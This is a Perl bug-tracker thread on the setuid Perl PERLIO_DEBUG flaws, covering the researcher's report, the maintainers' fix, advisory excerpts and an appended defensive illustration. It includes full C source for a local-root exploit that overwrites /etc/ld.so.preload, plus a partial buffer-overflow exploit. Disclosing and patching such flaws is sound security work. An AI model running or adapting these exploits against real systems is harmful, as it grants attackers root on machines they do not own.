setuid perl security issues #7777
Comments
From kf_lists@digitalmunition.com
PERLIO_DEBUG ./perlio.c: If $ENV{'PERLIO_DEBUG'} is not set PerlIO_debug() is a no-op. else you can do the following either via sperl or via sperl:
sperl: setuid wrapper:
These are all setuid programs that invoke perl scripts.
/usr/share/mooix/mooix-pty-helper.pl
kfinisterre@jdam:/tmp$ umask 001
kfinisterre@jdam:/tmp$ tail /tmp/oops2 -n 3
kfinisterre@jdam:/tmp$ echo + + > /tmp/oops2
hrmmm... gonna try to write an ld.so.preload exploit without trashing my box. hehe. fun time.
From kf_lists@digitalmunition.com
While looking at the source code to figure out what the details of my PERLIO_DEBUG file overwrite bug in perlio.c: if (dbg > 0) {
Set PERLIO_DEBUG to anything make a perl script calling sperl and run it with the full path (after placing it in a long ass directory)
#!/usr/bin/sperl5.8.4
kfinisterre@jdam:/tmp$ /tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.pl
stat64("/usr/local/share/perl/5.8.0", 0xbfffd880) = -1 ENOENT (No such file or directory)
From @rgs
KF (Lists) wrote:
I fixed the local root exploit by disabling PERLIO_DEBUG in sperl
--
The RT System itself - Status changed from 'new' to 'open'
From @rgs
Rafael Garcia-Suarez wrote:
hold on, it's not properly fixed now.
From @rgs
Rafael Garcia-Suarez wrote:
It's now :
Document the changes to PERLIO_DEBUG.
Change 23906 on 2005/01/31 by rgs@grubert
Really fix the bug [perl #33990].
@rgs - Status changed from 'open' to 'resolved'
From kf_lists@digitalmunition.com
Much thanks on the quick response and fix. Do you have any idea what the span of this bug is (like what versions
And finally, was this actually the buggy line of code for the overflow in perlio.c: if (dbg > 0) {
Thanks for your time.
-KF
From kf_lists@digitalmunition.com
/*
* Copyright Kevin Finisterre
*
* ** DISCLAIMER ** I am in no way responsible for your stupidity.
* ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code.
*
* ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
* ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or someone elses).
* ** WARNING ** have a boot disk ready incase some thing goes wrong.
*
* Setuid Perl exploit by KF - kf_lists[at]secnetops[dot]com - 1/30/05
*
* this exploits a vulnerability in the PERLIO_DEBUG functionality
* tested against sperl5.8.4 on Debian
*
* kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c
* kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
* ls: /etc/ld.so.preload: No such file or directory
* kfinisterre@jdam:~$ ./ex_perl
* sperl needs fd script
* You should not call sperl directly; do you need to change a #! line
* from sperl to perl?
* kfinisterre@jdam:~$ su -
* jdam:~# id
* uid=0(root) gid=0(root) groups=0(root)
* jdam:~# rm /etc/ld.so.preload
*
*/
#define PRELOAD "/etc/ld.so.preload"
#include <stdio.h>
#include <stdlib.h>    /* exit(), system(), putenv() */
#include <strings.h>
#include <sys/stat.h>  /* umask() */
int main(int argc, char **argv)
{
FILE *getuid;
if(!(getuid = fopen("/tmp/getuid.c","w+"))) {
printf("error opening file\n");
exit(1);
}
fprintf(getuid, "int getuid(){return 0;}\n" );
fclose(getuid);
system("cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc");
putenv("PERLIO_DEBUG="PRELOAD);
umask(001); // I'm rw-rw-rw james bitch!
system("/usr/bin/sperl5.8.4");
FILE *ld_so_preload;
char preload[] = {
"/tmp/getuid.so\n"
};
if(!(ld_so_preload = fopen(PRELOAD,"w+"))) {
printf("error opening file\n");
exit(1);
}
fwrite(preload,sizeof(preload)-1,1,ld_so_preload);
fclose(ld_so_preload);
}
From kf_lists@digitalmunition.com
/*
* Copyright Kevin Finisterre
*
* Setuid perl PerlIO_Debug() overflow
*
* cc -o ex_perl2 ex_perl2.c -std=c99
*
* Not complete yet...
*/
#include <stdlib.h>
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **argv)
{
int count = 5;
char malpath[10000];
char tmp[256];
char *filler;
chdir("/tmp/");
filler = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/";
for (int x=0; x<3; x=x+1)
{
mkdir(filler, 0777);
chdir(filler);
count = count + 256;
}
memset(tmp,0x42,201);
count = count + 201;
strcat(tmp, "/");
mkdir(tmp, 0777);
chdir(tmp);
printf ("Dirlen: %d\n", count);
FILE *perlsploit;
char perldummyfile[] = {
"#!/usr/bin/sperl5.8.4\n"
"# \n"
"# Be proud that perl(1) may proclaim: \n"
"# Setuid Perl scripts are safer than C programs ...\n"
"# Do not abandon (deprecate) suidperl. Do not advocate C wrappers. \n"
};
if(!(perlsploit = fopen("take_me.pl","w+"))) {
printf("error opening file\n");
exit(1);
}
fwrite(perldummyfile,sizeof(perldummyfile)-1,1,perlsploit);
fclose(perlsploit);
getcwd(malpath, 10000);
strcat(malpath, "/");
strcat(malpath, "take_me.pl");
printf("running: %s\n",malpath);
chmod(malpath,0755);
putenv("PERLIO_DEBUG=/tmp/ninjitsu");
system(malpath);
}
From @rgs
KF (lists) wrote:
I'd say every release since we have PerlIO, e.g. every 5.8.x for x in
That's to be appreciated by the maint pumpking. Vendors are of course encouraged to grab those patches. A new package of perl for mandrakelinux is already on its way to the
Yes. Actually only threaded perls were affected.
From @nwc10
On Mon, Jan 31, 2005 at 04:42:59PM +0100, Rafael Garcia-Suarez wrote:
Who was already planning to start the 5.8.7 release process at the end of
This seems to be the best way. We probably should wrap up all 3 patches into
Nicholas Clark
From @rgs
Nicholas Clark wrote:
Here's the single patch corresponding to my various commits in bleadperl : http://cvs.mandrakesoft.com/cgi-bin/cvsweb.cgi/
--
From kf_lists@digitalmunition.com
Rafael Garcia-Suarez via RT wrote:
Great... do you folks have a problem with me releasing an advisory at
From kf_lists@digitalmunition.com
There are currently NO posts on bugtraq for this issue. I notified
I had planned to do a bugtraq / full-disclosure release pretty much
In the past I have done simultaneous posts to bugtraq *with* a vendor. I
-KF
From kf_lists@digitalmunition.com
Great... let me know when you figure out how you want to proceed with
Thanks much.
From kf_lists@digitalmunition.com
I am going to try to verify the patch fixes later tonight... I will let
-KF
From kf_lists@digitalmunition.com
DMA[2005-0131a] - 'Setuid Perl PERLIO_DEBUG root owned file creation'
Description:
In the July 18, 2002 one of the highlights for Perl 5.8.0 was a 'New IO Implementation' called
As an attacker I would definitely say that PerlIO has some rich behavior. Two vulnerabilities
Perl provides debug access to PerlIO via an environment variable known as PERLIO_DEBUG. The perl
kfinisterre@jdam:~$ ls -al /usr/bin/sperl5.8.4
At this point the game is pretty much over. Since the file is world writable the attacker can add
kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c
The following patch for this bug was provided by Mandrake care of the vendor-sec list. This patch
Index: perlio.c
--- perlio.c (revision 4342)
This is the timeline associated with this bug.
01/30/2005 09:29 AM - Mail to larry wall, perlbug, vendor-sec et all
-KF
From kf_lists@digitalmunition.com
DMA[2005-0131b] - 'Setuid Perl PERLIO_DEBUG buffer overflow'
Description:
In the July 18, 2002 one of the highlights for Perl 5.8.0 was a 'New IO Implementation' called
As an attacker I would definitely say that PerlIO has some rich behavior. Two vulnerabilities
Perl provides debug access to PerlIO via an environment variable known as PERLIO_DEBUG. The perl
kfinisterre@kfinisterre01:/tmp$ cat > test.pl
The function responsible for logging the PerlIO data contains an unbounded call to sprintf() in perlio.c: if (dbg > 0) {
We can trigger this vulnerability by placing a perl script in a very long directory tree and
kfinisterre@kfinisterre01:~$ cc -o ex_perl2 ex_perl2.c -std=c99
It appears as if this vulnerability could be exploited to gain root privileges on the machine in
The following patch for this bug was provided by Mandrake care of the vendor-sec list. This patch
Index: perlio.c
--- perlio.c (revision 4342)
This is the timeline associated with this bug.
01/30/2005 09:29 AM - Mail to larry wall, perlbug, vendor-sec et all
-KF
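The two advisories above describe two distinct defects in the same code path: a setuid interpreter honouring a caller-supplied PERLIO_DEBUG path (root-owned file creation, DMA 2005-0131a) and an unbounded sprintf() into a fixed buffer when building the log line (DMA 2005-0131b), with the fix on the perl side being to disable PERLIO_DEBUG in sperl. The following is an added illustration written for this page, not code from perlio.c, from the patch, or from the thread; it models the two checks a setuid program needs around such a debug-log variable. The function names, DEBUG_BUF and the 40-character path limit in the format string are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Added illustration (not perlio.c). Two decisions a setuid program must get
 * right around a debug-log environment variable such as PERLIO_DEBUG:
 *
 *  1. whether the path may be honoured at all. A setuid binary inherits the
 *     variable from an unprivileged caller, so opening it with the effective
 *     (root) uid creates or truncates a root-owned file wherever the caller
 *     points it. The rule below refuses the variable whenever real and
 *     effective ids differ, the same idea as disabling PERLIO_DEBUG in sperl;
 *
 *  2. how the log line is built. A fixed buffer filled by sprintf() overflows
 *     once the caller-controlled script path is longer than the buffer;
 *     snprintf() with a length check reports truncation instead of writing
 *     past the end.
 *
 * DEBUG_BUF, the function names and the %.40s path limit are assumptions. */

#define DEBUG_BUF 1024   /* assumed fixed buffer size for one log line */

/* Returns env_value when it may be used as the log path, NULL otherwise. */
const char *debug_path_allowed(const char *env_value,
                               uid_t ruid, uid_t euid,
                               gid_t rgid, gid_t egid)
{
    if (ruid != euid || rgid != egid)        /* running with borrowed privilege */
        return NULL;
    if (env_value == NULL || *env_value == '\0')
        return NULL;
    return env_value;
}

/* Bounded replacement for sprintf(buf, "%s:%ld %s", file, line, msg).
 * Returns the number of bytes written (excluding the NUL), or -1 and an
 * empty buffer when the line would not fit in outsz bytes. The %.40s
 * precision is a second, independent bound on the caller-controlled path. */
int format_debug_line_safe(char *out, size_t outsz,
                           const char *file, long line, const char *msg)
{
    int n = snprintf(out, outsz, "%.40s:%ld %s", file, line, msg);
    if (n < 0 || (size_t)n >= outsz) {
        if (outsz > 0)
            out[0] = '\0';
        return -1;
    }
    return n;
}

int main(void)
{
    char buf[DEBUG_BUF];
    /* Compare the real and effective ids of this process before trusting
     * anything taken from the environment. */
    const char *path = debug_path_allowed(getenv("PERLIO_DEBUG"),
                                          getuid(), geteuid(),
                                          getgid(), getegid());
    printf("PERLIO_DEBUG is %s\n", path ? "honoured" : "ignored");

    if (format_debug_line_safe(buf, sizeof buf, "/tmp/test.pl", 42, "open") < 0)
        puts("debug line truncated");
    else
        puts(buf);
    return 0;
}
```

Run unprivileged with PERLIO_DEBUG set, the program honours the variable because real and effective ids match; the same binary installed setuid would ignore it. The formatting check matters independently: even with the path truncated to 40 characters, a small destination buffer is reported as a truncation rather than overrun.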
Migrated from rt.perl.org#33990 (status was 'resolved')
Searchable as RT33990$